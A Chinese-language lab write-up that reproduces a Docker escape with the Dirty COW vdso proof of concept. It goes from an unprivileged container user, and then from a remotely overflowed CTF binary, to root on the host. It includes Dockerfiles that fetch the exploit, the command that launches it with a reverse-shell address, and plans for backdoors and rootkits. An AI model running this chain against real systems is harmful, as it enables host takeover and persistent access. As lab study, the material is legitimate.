0x00 前述

最近出比赛题用到Docker,于是就想到了脏牛火的那段时间有一个利用它做Docker逃逸的PoC。再一看,发现和vdso有关,恰好最近研究溢出也遇到了这个东西。

原作者演示的是容器中的root用户提权到VM中的root用户;我们这里则在镜像中加入一个普通用户ubuntu,演示从容器中的普通用户提权到VM中的root用户

0x01 环境搭建

VM

手头有一个ubuntu-14.04.4-desktop-amd64.iso就直接拿来开新的VM了(我用PoC验证过是存在脏牛漏洞的)。之前也一直想过这个问题:研究漏洞需要老的内核,官网上好像不好直接下老的。如果恰好没有旧的VM或者镜像,可以考虑装一个新的VM然后做一下内核降级(我没有做),可以参考这里

另外就是更新源的问题。我把sources.list换成了上交的源,否则可能会很慢。

Docker

Docker的安装可以参考官方文档。不过也可以直接把官方文档里的步骤写成下面这个脚本(不保证未来能用):

sudo apt-get update

sudo apt-get install -y \
        linux-image-extra-$(uname -r) \
        linux-image-extra-virtual

sudo apt-get install -y \
        apt-transport-https \
        ca-certificates \
        curl \
        software-properties-common

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

sudo add-apt-repository \
        "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
        $(lsb_release -cs) \
        stable"

sudo apt-get update
sudo apt-get install -y docker-ce

之后似乎非root用户不能用docker ps,解决一下:

sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart

退出当前用户重新登陆一下就好。

Ubuntu Image

国外仓库下载比较慢,我就直接从国内Docker镜像仓库下载了。感谢国内仓库。

docker pull registry.docker-cn.com/library/ubuntu:14.04

docker-compose

之后需要下载docker-compose。我发现官网给出的使用curl下载的命令并不好用,下载不稳定时常速度为0。我是在外边用迅雷下完然后拷进去的。下载地址是:

https://github.com/docker/compose/releases/download/1.17.1/docker-compose-Linux-x86_64
sudo cp ~/dirtycow/docker-compose-Linux-x86_64 /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

Exp

再把逃逸程序从Github上clone下来(其实可以跳过这步,因为后面的Dockerfile里有这一步):

git clone https://github.com/gebl/dirtycow-docker-vdso.git

最后看一下目前的环境:

uname -a
    Linux br-virtual-machine 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan22
    15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

docker -v
    Docker version 17.09.0-ce, build afdb6d4

docker-compose -v
    docker-compose version 1.17.1, build 6d101fb

一切就绪。建议到这里对VM做一个快照。

0x02 实验

0x020 子实验:本地Docker逃逸

创建镜像/运行容器

由于我们使用了国内的Docker仓库,所以也许需要在Dockerfile下稍微改动一下。这里同样涉及到更新源的问题。同样地,我在Dockerfile把源先给更换成了上海交通大学的源。

所以最终我们实验的Dockerfile如下:

FROM registry.docker-cn.com/library/ubuntu:14.04

RUN mv /etc/apt/sources.list /etc/apt/sources.list.bak

ADD ./sources.list /etc/apt/
RUN apt-get update
RUN apt-get install -y build-essential
RUN apt-get install -y nasm
RUN apt-get install -y git

RUN useradd --create-home ubuntu
WORKDIR /home/ubuntu/
RUN git clone https://github.com/scumjr/dirtycow-vdso.git
RUN chown -R ubuntu:ubuntu /home/ubuntu/dirtycow-vdso

EXPOSE 1234

CMD /bin/bash

执行下面的命令来创建并运行容器:

docker-compose run dirtycow /bin/bash

注意:除了之前的环境搭建外,到目前为止,以上操作均在普通用户权限下进行(我这里的普通用户叫做br),也没有任何的sudo

建议到这里也可以对VM做一个快照。这个Docker逃逸只能做一次,成功后退出root shell再次执行攻击时会失败,具体原因我还没有深入了解。

进入以后执行:

su ubuntu
cd /home/ubuntu/dirtycow-vdso
make
./0xdeadbeef 172.18.0.2:10000

由于最后获得的事实上是一个反弹shell,所以要给出反弹的IP和端口。端口可以随意设置,IP可以用ifconfig查看。我对Docker的网络机制不了解,以后记得去研究一下。

看一下截图:

我们在VM中以root权限创建/root/flag并写入

flag{Welcome_2_the_real_world}

下面看一下Docker逃逸成功的效果:

至此,完成了本地Docker逃逸。

0x021 子实验:远程先Pwn后逃逸

这里的环境设置是这样的:

Tongji CTF 2017中的pwn3000x01 环境搭建中的配置组合。

能够被缓冲区溢出取得shell的pwn300可以从这里获得。

修改后的Dockerfile如下:

FROM registry.docker-cn.com/library/ubuntu:14.04

RUN mv /etc/apt/sources.list /etc/apt/sources.list.bak
ADD ./sources.list /etc/apt/

RUN dpkg --add-architecture i386
RUN apt-get update
RUN apt-get install -y apt-utils libc6-i386 socat build-essential nasm git

RUN useradd --create-home ubuntu
WORKDIR /home/ubuntu/
RUN git clone https://github.com/scumjr/dirtycow-vdso.git
RUN chown -R ubuntu:ubuntu /home/ubuntu/dirtycow-vdso

COPY ./bin/pwn300 ./bin/flag /home/ubuntu/
RUN chown ubuntu:ubuntu /home/ubuntu/pwn300
RUN chmod u+x /home/ubuntu/pwn300

EXPOSE 1234 10000

CMD ["/bin/bash"]

ENTRYPOINT su -c "nohup socat tcp-listen:10000,reuseaddr,fork exec:./pwn300" ubuntu

本子实验涉及到两台VM,分别是作为靶机Ubuntu14.04(即前文所述VM)和作为攻击者kali 2017.01

网络环境如下:

Attacker IP: 192.168.246.22
Victim IP: 192.168.246.135

靶机上的Docker网络环境如下:

Host IP (Victim): 172.17.0.1
Container IP: 172.17.0.2

在靶机上线容器:

docker build -t mydirtycow .
docker run -p 10001:10000 -d mydirtycow

注意到kali上没有pwntools,直接从官方源下载又很慢,所以找了清华的源:

pip install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple

OK.万事俱备,开始搞事。

① 编写攻击脚本

② 执行脚本,获取普通shell,检测后发现处于容器环境

还有更多的检测方法,可以参考这里。另外,事实上容器内可以做很好的反检测机制,本次实验暂未涉及这些反检测机制。

③ 在容器内编译逃逸程序

这里省略了git clone的过程(在上面的Dockerfile中做过了。严格来说这一步也应该是攻击者自己完成的)。

在编译过程中遇到一个问题,无论怎么编译,都生成不了0xdeadbeef.o和后续的0xdeadbeef,可是我在靶机内的容器中直接操作是可以编译的:

缓冲区溢出获得的shell又没有stderr,所以只好通过2>来重定向到文件中来查明问题。

发现是环境变量的问题。获得的shell里除了PWDOLDPWD外没有其他任何变量了,没有PATH。于是我用/usr/bin/gcc代替了Makefile中的$(CC),这次.o文件有了,但是最终的可执行程序依然出不来。手动在选项里添加了-I-L指定头文件和库路径也不行,查标准错误输出发现是ld的相关问题,不太好解决。于是我简单地设置了PATH(可以根据经验简单地罗列):

export PATH=/bin/:/sbin:/usr/bin:/usr/local/bin:/usr/sbin:/usr/local/sbin

之后就可以正常make了。

④ 发起攻击,逃逸成功

至此,完成了从简单的远程栈溢出获得容器内普通权限shell到逃逸获得宿主机内root权限shell的过程。中间也踩了一些坑,如环境变量问题等。

0x022 子实验:远程Pwn并逃逸后在宿主机上的POST-PENETRATION

再下一步,可以做一些post penetration工作。在模拟真实服务器上安装后门,维持访问。这一阶段的实验可以分为两个子实验:一是安装简单的后门,如“一句话后门等”;二是安装rootkit,这一子实验中又可以对用户层rootkit安装和内核层rootkit安装分别进行测试。

今天先到这里,日后把后几个实验补上。

0x03 参考